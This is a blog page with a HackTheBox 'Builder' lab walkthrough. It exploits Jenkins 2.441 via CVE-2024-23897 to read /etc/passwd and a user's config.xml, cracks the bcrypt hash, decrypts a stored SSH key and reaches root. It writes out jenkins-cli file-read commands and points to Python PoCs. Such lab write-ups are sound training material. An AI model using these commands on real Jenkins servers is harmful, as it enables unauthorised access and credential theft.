<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Builder | Perplex blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>Builder</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-07-19T03:25:40.000Z" id="date"> 2024-07-19</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-09-21T17:06:36.282Z" id="updated"> 2024-09-21</time></div></span></div></div><hr><div id="post-content"><p>I started with a Nmap scan to know things that are running on this machine </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/34b121k7ebbgk4injmte3/Pasted-image-20240331113546.png?rlkey=sj8xn7qoz0252pcx55d4ri0h0&st=94yli4f1&dl=0'><img src="https://dl.dropbox.com/scl/fi/34b121k7ebbgk4injmte3/Pasted-image-20240331113546.png?rlkey=sj8xn7qoz0252pcx55d4ri0h0&st=94yli4f1&dl=0" alt="builder 1"><br>from the above nmap scan we can see port 22 and 8080 is open<br>in port 8080 jetty is running (jetty is a java web server or a servelet container)<br><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Jetty_(web_server)">https://en.wikipedia.org/wiki/Jetty_(web_server)</a></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/qzn7ovjxvi2m4f7ckvqy6/Pasted-image-20240331113836.png?rlkey=wiyj2n6iktk9f4dyprurz38mo&st=96j6qqzs&dl=0'><img src="https://dl.dropbox.com/scl/fi/qzn7ovjxvi2m4f7ckvqy6/Pasted-image-20240331113836.png?rlkey=wiyj2n6iktk9f4dyprurz38mo&st=96j6qqzs&dl=0" alt="builder 2"></p>
<p>Here’s the jenikins dashboard and jenikins version is 2.441</p>
<p>in the people tab we have a user called jennifer </p>
<p>enkins is a Java application. The server is Jetty, a Java web server.</p>
<p>I’m going to skip the directory brute force given that I know exactly what this application is.</p>
<p>After a bit of searching i finally fund the vuln for 2.441 version</p>
<p><a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897?source=post_page-----143ad7fde347--------------------------------">https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897?source=post_page-----143ad7fde347--------------------------------</a></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/76505wvjdloqlmmh33wjj/Pasted-image-20240331114637.png?rlkey=4oayeovwlzjj2it0rph9mgg8s&st=udj0q62f&dl=0'><img src="https://dl.dropbox.com/scl/fi/76505wvjdloqlmmh33wjj/Pasted-image-20240331114637.png?rlkey=4oayeovwlzjj2it0rph9mgg8s&st=udj0q62f&dl=0" alt="builder 3"></p>
<p>from the above information, The <code>jenkins-cli.jar</code> file is a Java archive file that contains the Jenkins CLI utility. This utility allows users to interact with Jenkins from the command line or from scripts.</p>
<p>for more information about jenikins cli refer to the documentation<br><a target="_blank" rel="noopener" href="https://www.jenkins.io/doc/book/managing/cli/#downloading-the-client">https://www.jenkins.io/doc/book/managing/cli/#downloading-the-client</a></p>
<p>Jenkins CLI allows users to reference a file path using the syntax @[filepath], and Jenkins will replace it with the contents of the referenced file.</p>
<ol>
<li><p><strong>User Input</strong>: When using the Jenkins CLI, a user might input a command or script that includes references to files using the @[filepath] syntax. For example:</p>
<p> bashCopy code</p>
<p> <code>jenkins-cli command @[path/to/file]</code></p>
</li>
<li><p><strong>Interpretation</strong>: Jenkins CLI interprets this syntax as a directive to read the contents of the specified file.</p>
</li>
<li><p><strong>File Read Operation</strong>: Jenkins CLI then performs a file read operation, reading the contents of the specified file referenced in the command.</p>
</li>
<li><p><strong>Replacement</strong>: After reading the file contents, Jenkins replaces the @[filepath] syntax in the command&#x2F;script with the actual contents of the file.</p>
</li>
<li><p><strong>Command Execution</strong>: Finally, Jenkins executes the modified command or script with the replaced file contents.</p>
</li>
</ol>
<p>i downloaded the jenikins cli using the wget command </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/nvq9612rw82nwr8arjh7l/Pasted-image-20240331121014.png?rlkey=k55tyn5y60yq0uszjos3eiit5&st=gzb15ifm&dl=0'><img src="https://dl.dropbox.com/scl/fi/nvq9612rw82nwr8arjh7l/Pasted-image-20240331121014.png?rlkey=k55tyn5y60yq0uszjos3eiit5&st=gzb15ifm&dl=0" alt="builder 4"></p>
<p>the command java -jar jenikind-cli.jar -s ‘ip:port’ help to give the list of all the commands </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">──(kali㉿kali)-[~/Desktop/builder]<br>└─$ java -jar jenkins-cli.jar -s &#x27;http://10.129.230.169:8080&#x27; help kali<br>Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true<br>  add-job-to-view<br>    Adds jobs to view.<br>  build<br>    Builds a job, and optionally waits until its completion.<br>  cancel-quiet-down<br>    Cancel the effect of the &quot;quiet-down&quot; command.<br>  clear-queue<br>    Clears the build queue.<br>  connect-node<br>    Reconnect to a node(s)<br>  console<br>    Retrieves console output of a build.<br>  copy-job<br>    Copies a job.<br>  create-credentials-by-xml<br>    Create Credential by XML<br>  create-credentials-domain-by-xml<br>    Create Credentials Domain by XML<br>  create-job<br>    Creates a new job by reading stdin as a configuration XML file.<br>  create-node<br>    Creates a new node by reading stdin as a XML configuration.<br>  create-view<br>    Creates a new view by reading stdin as a XML configuration.<br>  declarative-linter<br>    Validate a Jenkinsfile containing a Declarative Pipeline<br>  delete-builds<br>    Deletes build record(s).<br>  delete-credentials<br>    Delete a Credential<br>  delete-credentials-domain<br>    Delete a Credentials Domain<br>  delete-job<br>    Deletes job(s).<br>  delete-node<br>    Deletes node(s)<br>  delete-view<br>    Deletes view(s).<br>  disable-job<br>    Disables a job.<br>  disable-plugin<br>    Disable one or more installed plugins.<br>  disconnect-node<br>    Disconnects from a node.<br>  enable-job<br>    Enables a job.<br>  enable-plugin<br>    Enables one or more installed plugins transitively.<br>  get-credentials-as-xml<br>    Get a Credentials as XML (secrets redacted)<br>  get-credentials-domain-as-xml<br>    Get a Credentials Domain as XML<br>  get-job<br>    Dumps the job definition XML to stdout.<br>  get-node<br>    Dumps the node definition XML to stdout.<br>  get-view<br>    Dumps the view definition XML to stdout.<br>  groovy<br>    Executes the specified Groovy script. <br>  groovysh<br>    Runs an interactive groovy shell.<br>  help<br>    Lists all the available commands or a detailed description of single command.<br>  import-credentials-as-xml<br>    Import credentials as XML. The output of &quot;list-credentials-as-xml&quot; can be used as input here as is, the only needed change is to set the actual Secrets which are redacted in the output.<br>  install-plugin<br>    Installs a plugin either from a file, an URL, or from update center. <br>  keep-build<br>    Mark the build to keep the build forever.<br>  list-changes<br>    Dumps the changelog for the specified build(s).<br>  list-credentials<br>    Lists the Credentials in a specific Store<br>  list-credentials-as-xml<br>    Export credentials as XML. The output of this command can be used as input for &quot;import-credentials-as-xml&quot; as is, the only needed change is to set the actual Secrets which are redacted in the output.<br>  list-credentials-context-resolvers<br>    List Credentials Context Resolvers<br>  list-credentials-providers<br>    List Credentials Providers<br>  list-jobs<br>    Lists all jobs in a specific view or item group.<br>  list-plugins<br>    Outputs a list of installed plugins.<br>  mail<br>    Reads stdin and sends that out as an e-mail.<br>  offline-node<br>    Stop using a node for performing builds temporarily, until the next &quot;online-node&quot; command.<br>  online-node<br>    Resume using a node for performing builds, to cancel out the earlier &quot;offline-node&quot; command.<br>  quiet-down<br>    Quiet down Jenkins, in preparation for a restart. Don’t start any builds.<br>  reload-configuration<br>    Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk.<br>  reload-job<br>    Reload job(s)<br>  remove-job-from-view<br>    Removes jobs from view.<br>  replay-pipeline<br>    Replay a Pipeline build with edited script taken from standard input<br>  restart<br>    Restart Jenkins.<br>  restart-from-stage<br>    Restart a completed Declarative Pipeline build from a given stage.<br>  safe-restart<br>    Safe Restart Jenkins. Don’t start any builds.<br>  safe-shutdown<br>    Puts Jenkins into the quiet mode, wait for existing builds to be completed, and then shut down Jenkins.<br>  session-id<br>    Outputs the session ID, which changes every time Jenkins restarts.<br>  set-build-description<br>    Sets the description of a build.<br>  set-build-display-name<br>    Sets the displayName of a build.<br>  shutdown<br>    Immediately shuts down Jenkins server.<br>  stop-builds<br>    Stop all running builds for job(s)<br>  update-credentials-by-xml<br>    Update Credentials by XML<br>  update-credentials-domain-by-xml<br>    Update Credentials Domain by XML<br>  update-job<br>    Updates the job definition XML from stdin. The opposite of the get-job command.<br>  update-node<br>    Updates the node definition XML from stdin. The opposite of the get-node command.<br>  update-view<br>    Updates the view definition XML from stdin. The opposite of the get-view command.<br>  version<br>    Outputs the current version.<br>  wait-node-offline<br>    Wait for a node to become offline.<br>  wait-node-online<br>    Wait for a node to become online.<br>  who-am-i<br>    Reports your credential and permissions.<br><br>ERROR: No such command kali. Available commands are above. <br><br></code></pre></td></tr></table></figure>


<p>The above are the list of commands we can execute in jenikins CLI</p>
<p>i executed whoami cmd here</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/q3g3urkz3qlnzwlierdoa/Pasted-image-20240331121429.png?rlkey=vv8x3to1jia0ukrdp7ubixwvr&st=3igyer7w&dl=0'><img src="https://dl.dropbox.com/scl/fi/q3g3urkz3qlnzwlierdoa/Pasted-image-20240331121429.png?rlkey=vv8x3to1jia0ukrdp7ubixwvr&st=3igyer7w&dl=0" alt="builder 5"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/s4rqdqed0xivmx33ye4yp/Pasted-image-20240331122025.png?rlkey=12lw9qnqw6e4nxc9ou6rbwwd8&st=n9xee0xs&dl=0'><img src="https://dl.dropbox.com/scl/fi/s4rqdqed0xivmx33ye4yp/Pasted-image-20240331122025.png?rlkey=12lw9qnqw6e4nxc9ou6rbwwd8&st=n9xee0xs&dl=0" alt="builder 6"></p>
<p><code>&#39;@/etc/passwd&#39;</code>: This part of the command is specifying a file path, <code>&#39;/etc/passwd&#39;</code>, using the syntax <code>@filepath</code></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/250rh8ynd7wa0uw8glbs2/Pasted-image-20240331122250.png?rlkey=bxeeo0dveaik8uo98ujwkpt4c&st=lknji9iw&dl=0'><img src="https://dl.dropbox.com/scl/fi/250rh8ynd7wa0uw8glbs2/Pasted-image-20240331122250.png?rlkey=bxeeo0dveaik8uo98ujwkpt4c&st=lknji9iw&dl=0" alt="builder 7"></p>
<p>We found the hostname by reading &#x2F;etc&#x2F;hostname file<br>The hostname is “0f52c222a4cc”.</p>
<p>I googled where Jenkins user files are stored</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/l9fzmfmtrdox0h6ziw4xu/Pasted-image-20240331140629.png?rlkey=nid39ny7okgynp0p8bve2o825&st=yng7pwwi&dl=0'><img src="https://dl.dropbox.com/scl/fi/l9fzmfmtrdox0h6ziw4xu/Pasted-image-20240331140629.png?rlkey=nid39ny7okgynp0p8bve2o825&st=yng7pwwi&dl=0" alt="builder 8"></p>
<p>so modified the code and tried to read the user.txt file and got the user flag </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/u0rfyktg4k5yw10x7crlv/Pasted-image-20240331142430.png?rlkey=z02etfvrxcq9tx4i4x31sp7b3&st=u30gts6t&dl=0'><img src="https://dl.dropbox.com/scl/fi/u0rfyktg4k5yw10x7crlv/Pasted-image-20240331142430.png?rlkey=z02etfvrxcq9tx4i4x31sp7b3&st=u30gts6t&dl=0" alt="builder 9"></p>
<p>Jenkins <a target="_blank" rel="noopener" href="https://dev.to/pencillr/spawn-a-jenkins-from-code-gfa">stores information</a> about its user accounts in <code>/var/jenkins_home/users/users.xml</code>. Using <code>reload-node</code>, I’ll get the lines of that file, albeit a bit scrambed:</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/tscw0ss6pjii8dqdywiu6/Pasted-image-20240331141106.png?rlkey=344bc2obwuikq23i01gjdkeym&st=k9jyzzua&dl=0'><img src="https://dl.dropbox.com/scl/fi/tscw0ss6pjii8dqdywiu6/Pasted-image-20240331141106.png?rlkey=344bc2obwuikq23i01gjdkeym&st=k9jyzzua&dl=0" alt="builder 10"></p>
<p>with this command i got the jennifier id with this i tried to view config file of jenifer </p>
<p>java -jar jenkins-cli.jar -s ‘<a target="_blank" rel="noopener" href="http://10.129.230.169:8080/">http://10.129.230.169:8080</a>‘ reload-job ‘@&#x2F;var&#x2F;jenkins_home&#x2F;users&#x2F;jennifer_12108429903186576833&#x2F;config.xml’</p>
<p>the output is very clumsy but in the end i found a password hash shown below</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/7ik40pduoknse9hjpzsjk/Pasted-image-20240331134945.png?rlkey=u0poptfpbvhuboxdtwq26a5qw&st=z458acg5&dl=0'><img src="https://dl.dropbox.com/scl/fi/7ik40pduoknse9hjpzsjk/Pasted-image-20240331134945.png?rlkey=u0poptfpbvhuboxdtwq26a5qw&st=z458acg5&dl=0" alt="builder 11"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/qqxosxa0p3rqq7uyiwfnu/Pasted-image-20240331135036.png?rlkey=xlz87d97tzbl1jb2lrzwvoq4e&st=8us0y2lb&dl=0'><img src="https://dl.dropbox.com/scl/fi/qqxosxa0p3rqq7uyiwfnu/Pasted-image-20240331135036.png?rlkey=xlz87d97tzbl1jb2lrzwvoq4e&st=8us0y2lb&dl=0"></p>
<p>There’s another way to get this password hash using Python code proof-of-concept (PoC) for exploiting a vulnerability in Jenkins servers that allows arbitrary file read through the Jenkins CLI.<br>where i’ve mentioned below <a href="#Python%20POCs">Python POCs</a></p>
<p>I used JTR to crack the password in the config.xml he format is specified as bcrypt so i specified format to get the result faster</p>
<p>and then with the username jennifer and password princess i logged into the jenikins and here’s the view of global credentials management </p>
<p>earlier we are unable to open this beacuse we aren’t logged in as jennifer </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/z3chpo65pp6xcncjx87dq/Pasted-image-20240331135419.png?rlkey=if0bimue23yvw66hrnw9de4t1&st=hf2a2u1q&dl=0'><img src="https://dl.dropbox.com/scl/fi/z3chpo65pp6xcncjx87dq/Pasted-image-20240331135419.png?rlkey=if0bimue23yvw66hrnw9de4t1&st=hf2a2u1q&dl=0" alt="builder 12"></p>
<p>if you inspect the value you will find private key in commented sections </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/toqbwv5ban14w1m8uynku/Pasted-image-20240331132427.png?rlkey=zi9dir3yjx6tjmpmw364ake4i&st=bbmlzopd&dl=0'><img src="https://dl.dropbox.com/scl/fi/toqbwv5ban14w1m8uynku/Pasted-image-20240331132427.png?rlkey=zi9dir3yjx6tjmpmw364ake4i&st=bbmlzopd&dl=0" alt="builder 13"></p>
<p>we found the private key but it’s encrypted so i googled how to decrypt Jenkins private key or secret key and it led me to this </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/a2y3s2tfhlyw74krfbj5j/Pasted-image-20240331133823.png?rlkey=msg2j5z64q18ysw81q3tmq5s1&st=2jysoh8f&dl=0'><img src="https://dl.dropbox.com/scl/fi/a2y3s2tfhlyw74krfbj5j/Pasted-image-20240331133823.png?rlkey=msg2j5z64q18ysw81q3tmq5s1&st=2jysoh8f&dl=0" alt="builder 14"></p>
<p>In the script console under manage jenkins i’v epasted this script i found in stack exchange and got the ssh key </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/wfvou65zmh6nknlim1j1t/Pasted-image-20240331140116.png?rlkey=9n888kpnqtxej7dwn42enrhhq&st=hn3fzmfq&dl=0'><img src="https://dl.dropbox.com/scl/fi/wfvou65zmh6nknlim1j1t/Pasted-image-20240331140116.png?rlkey=9n888kpnqtxej7dwn42enrhhq&st=hn3fzmfq&dl=0" alt="builder 15"></p>
<p>so i stored the key and accessd ssh i got the shell login but for everything i do i’m getting permission denied as below</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/ka4frpdm2hev6x03l7frh/Pasted-image-20240331134218.png?rlkey=3nfuqk59uz5f0xi515fr4rbsm&st=ob3z5142&dl=0'><img src="https://dl.dropbox.com/scl/fi/ka4frpdm2hev6x03l7frh/Pasted-image-20240331134218.png?rlkey=3nfuqk59uz5f0xi515fr4rbsm&st=ob3z5142&dl=0" alt="builder 16"></p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/0v8oowo5bozhntnan4nv5/Pasted-image-20240331134254.png?rlkey=v291ahpy6lzdzre6qnj3i68ex&st=ztkpoyhs&dl=0'><img src="https://dl.dropbox.com/scl/fi/0v8oowo5bozhntnan4nv5/Pasted-image-20240331134254.png?rlkey=v291ahpy6lzdzre6qnj3i68ex&st=ztkpoyhs&dl=0" alt="builder 17"></p>
<p>so i gave the root permissions to the ssh file and logged in again and i got the root access as below</p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/7hylzkg2f32zkqs23su6e/Pasted-image-20240331134319.png?rlkey=2pyvhucuvm9pqm1hp2ad4xtl4&st=hl5j70y9&dl=0'><img src="https://dl.dropbox.com/scl/fi/7hylzkg2f32zkqs23su6e/Pasted-image-20240331134319.png?rlkey=2pyvhucuvm9pqm1hp2ad4xtl4&st=hl5j70y9&dl=0" alt="builder 18"></p>
<p>cat root.txt gave me the root flag </p>
<p class='item-img' data-src='https://dl.dropbox.com/scl/fi/bbdi6cqogdudrcpk77ksp/Pasted-image-20240331134642.png?rlkey=oiay33ownyq2vkwtz4x13b1gt&st=9ppe98hn&dl=0'><img src="https://dl.dropbox.com/scl/fi/bbdi6cqogdudrcpk77ksp/Pasted-image-20240331134642.png?rlkey=oiay33ownyq2vkwtz4x13b1gt&st=9ppe98hn&dl=0" alt="builder 19"></p>
<h4 id="Python-POCs"><a href="#Python-POCs" class="headerlink" title="Python POCs"></a>Python POCs</h4><p>There are Python POCs out there on GitHub that will do a similar thing. They don’t really add anything over the JAR file, so I prefer that method. They do work to make similar output:</p>
<p>for reference : <a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=toPJhfy-wvw&t=84s">https://www.youtube.com/watch?v=toPJhfy-wvw&amp;t=84s</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/binganao/CVE-2024-23897/tree/main">https://github.com/binganao/CVE-2024-23897/tree/main</a></p>
<p>this code exploits a vulnerability in Jenkins CLI by crafting a malicious payload that triggers arbitrary file read (<code>/etc/passwd</code> in this case) through the Jenkins server. It sends specially crafted HTTP requests to the server to exploit this vulnerability.<br>usuage : </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">python poc.py<br>[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]<br></code></pre></td></tr></table></figure><div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2024/07/19/HackTheBox/Linux/perfection/">← Next Perfection</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2024/07/19/HackTheBox/Linux/Academy/">Academy Prev →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://dl.dropbox.com/scl/fi/fqvt7r79helfg6xr2ezg0/law-removebg-preview.png?rlkey=d897y2x6cos2hcasqagui6wy9&amp;st=itvktys9&amp;dl=0" alt="Logo"></a><h1 id="Dr"><a href="/">Santhosh vardan</a></h1><div id="description"><p></p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/darkrider00"><i class="fab fa-github" alt="GitHub"></i></a><a class="social" href="mailto:santoshvardan007@gmail.com"><i class="fa fa-envelope" alt="E-Mail"></i></a><a class="social" target="_blank" rel="noopener" href="https://x.com/perplex_007"><i class="fa-brands fa-twitter" alt="Twitter"></i></a><a class="social" target="_blank" rel="noopener" href="https://www.linkedin.com/in/perplex007/"><i class="fab fa-linkedin" alt="Linkedin"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Python-POCs"><span class="toc-number">1.</span> <span class="toc-text">Python POCs</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>